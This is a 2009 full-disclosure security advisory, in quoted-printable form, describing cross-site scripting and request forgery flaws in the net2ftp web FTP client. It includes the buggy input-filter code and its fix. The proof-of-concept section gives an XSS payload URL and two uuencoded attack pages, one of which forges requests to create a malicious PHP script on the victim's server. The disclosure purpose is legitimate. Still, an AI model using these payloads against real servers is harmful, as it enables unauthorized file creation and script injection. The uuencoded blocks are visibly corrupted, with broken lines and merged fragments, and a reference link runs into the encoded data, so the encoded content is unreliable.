#=cicatriz =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#=0D 
				     /)           /)     /)                   =0D
			_ _  _______(/ ________  // _   (/_ _       _____  _  =0D
			(/__(_)(_)(_(_(_)(_)    (/_(_(_/_) /_)_ o  (_)/ (_(_/_=0D
						                         .-/  =0D
#=net2ftp <= 0.97 Cross-Site Scripting/Request Forgery=#=~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
#=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
=0D
	Title: net2ftp <= 0.97 Cross-Site Scripting/Request Forgery=0D
	Advisory ID: VUDO-2009-0804=0D
Advisory URL: http://research.voodoo-labs.org/advisories/3=0D 
	Date founded: 2009-04-02=0D
	Vendors contacted: net2ftp=0D
	Class: Multiple Vulnerabilities=0D
	Remotely Exploitable: Yes=0D
	Localy Exploitable: No=0D
	Exploit/PoC Available: Yes=0D
	Policy: Full Disclosure Policy (RFPolicy) v2.0=0D
=0D
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
#=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
=0D
	[+] net2ftp 0.97=0D
	[+] net2ftp 0.95=0D
	=0D
	Beta:=0D
		[*] net2ftp 0.98 beta=0D
	=0D
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
#=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
=0D
The vendor didn't released any fix/update.=0D
=0D
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
#=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
=0D
Multiple vulnerabilities were found on the package net2ftp [1], version 0.98 and below. Two types of=0D
vulnerabilities were found: Cross-Site Scripting and Cross-Site Request Forgery.=0D
=0D
[*] Cross-Site Scripting (XSS):=0D
=0D
	This vulnerability it's produced by a "typo" in the function validateGeneriInput(), where the=0D
	extraction of characters < and > fails because the regular expression in charge of the extraction =0D
	it's invalid.=0D
	=0D
	+++includes/registerglobals.inc.php @@ 1088:1102=0D
	  1088  function validateGenericInput($input) {=0D
	  1089=0D
	  1090  // --------------=0D
	  1091  // Remove the following characters <>=0D
	  1092  // --------------=0D
	  1093=0D
	  1094  // Remove XSS code=0D
	  1095  //      $input = RemoveXSS($input);=0D
	  1096=0D
	  1097  // Remove < >=0D
XXX	  1098		$input = preg_replace("/\\<\\>]/", "", $input);=0D
	  1099	=0D
	  1100		return $input;=0D
	  1101	=0D
	  1102	} // end validateGenericInput=0D
	---includes/registerglobals.inc.php=0D
	=0D
	This can be easily fixed adding a "[" character to the pattern:=0D
	=0D
	+++=0D
	$input = preg_replace("/[\\<\\>]/", "", $input);=0D
	---=0D
=0D
[*] Cross-Site Request Forgery (CSRF):=0D
=0D
	All the forms on the web application are vulnerable because they doesn't check any type of token to=0D
	ensure that the user submited the form. So an attacker can trick the user to visit a website with this=0D
	type of method and perform certain actions on the server, like create files, delete/rename/upload/etc.=0D
	=0D
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#=0D
=0D
[*] Cross-Site Scripting (XSS):=0D
=0D
	+++=0D
http://ftp.victim.com/?state=login_small&errormessage= onload="alert(/voodoo/.source);">=0D 
	---=0D
	=0D
[*] Cross-Site Request Forgery (CSRF):=0D
	=0D
	With this HTML page an attacker can create a evil PHP script on the user's server. (uuencoded)=0D
	=0D
	+++=0D
	begin 644 attack.html=0D
	M/&AT;6P^"CQB;V1Y/@H)/&9OM='!S.B\O9G1P+G9I8W1I;2YC;VTO:6YD97@N<&AP(B!O;G-U8FUI=#TB(B!M=0D 
	M971H;V0](G!O7!E/2)H:61D=0D
	M96XB/@H)"3QI;G!U="!N86UE/2)U7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)L86YG=6%G=0D
	M92(@=F%L=64](F5N(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S=0D
	M:VEN(B!V86QU93TB:6YD:6$B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA=0D
	M;64](F9T<&UO9&4B('9A;'5E/2)B:6YA65S(B!T>7!E/2)H=0D
	M:61D96XB/@H)"3QI;G!U="!N86UE/2)S7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S=0D
	M=&%T92(@=F%L=64](F5D:70B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA=0D
	M;64](G-T871E,B(@=F%L=64](B(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@=0D
	M;F%M93TB9&ER96-T;W)Y(B!V86QU93TB+R(@='EP93TB:&ED9&5N(CX*"0D\=0D
	M:6YP=70@;F%M93TB'1A'1A3X*/"]H=&UL/@H*=0D">G+G-U8FUI="@I.PH\+W-C3X*/"]H=&UL/@H*=0D 
	`=0D
	end=0D
	---=0D
=0D
[*] CSRF + XSS:=0D
	=0D
	This is a Cross-Site Request Forgery attack that creates a simple Cross-Site Scripting attack in the=0D
	"Bookmark" section. It can be even worse because the bookmark string can be written according to the=0D
	attacker needs and the XSS vector can be permanent if the user saves that bookmark (and the string=0D
	it's also vulnerable to XSS). (uuencoded)=0D
	=0D
	+++=0D
	begin 644 xss-csrf-attack.html=0D
	M/&AT;6P^"CQB;V1Y/@H)/&9O7!E/2)H:61D96XB/@H)=0D
	M"3QI;G!U="!N86UE/2)F='!S97)V97)P;W)T(B!V86QU93TB,C$B('1Y<&4]=0D
	M(FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G5S97)N86UE(B!V86QU93TB=FEC=0D
	M=&EM=7-E7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S=0D
	M;W)T(B!V86QU93TB(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S=0D
	M;W)T;W)D97(B('9A;'5E/2(B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA=0D
	M;64](G-T871E(B!V86QU93TB8F]O:VUA2(@=F%L=64](B\B('1Y<&4]=0D
	M(FAI9&1E;B(^"@H)"3QI;G!U="!N86UE/2)UM:7!T.F%L97)T*#`I.R(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB=0D 
	M=&5X="(@=F%L=64](B9L=#MI9G)A;64@7!E/2)H:61D96XB=0D
	M/@H)/"]F;W)M/@H*/'-Chttp://www.net2ftp.com/=0D 
=0D
#=cicatriz =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#=0D 
#= mi=E9 08 abr 2009 ART =#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#